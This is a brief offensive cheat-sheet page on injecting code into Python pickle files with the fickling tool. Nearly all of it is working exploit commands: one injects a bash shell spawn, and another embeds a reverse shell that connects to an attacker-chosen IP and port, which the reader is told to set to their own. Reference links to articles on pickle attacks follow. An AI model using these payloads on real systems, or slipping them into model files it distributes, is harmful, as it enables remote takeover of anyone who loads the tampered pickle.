# Pickle Code Injection

### Exploit <a href="#exploit" id="exploit"></a>

```shellscript
fickling --inject "import os; os.system('/bin/bash')" example.pkl

# Reverse shell (replace "10.0.0.1" and 4444 with your own)
fickling --inject 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' example.pkl
```

### References <a href="#references" id="references"></a>

* [fickling](https://github.com/trailofbits/fickling)
* [The Trail of Bits Blog](https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/)
* [The Hacker News](https://thehackernews.com/2024/06/new-attack-technique-sleepy-pickle.html)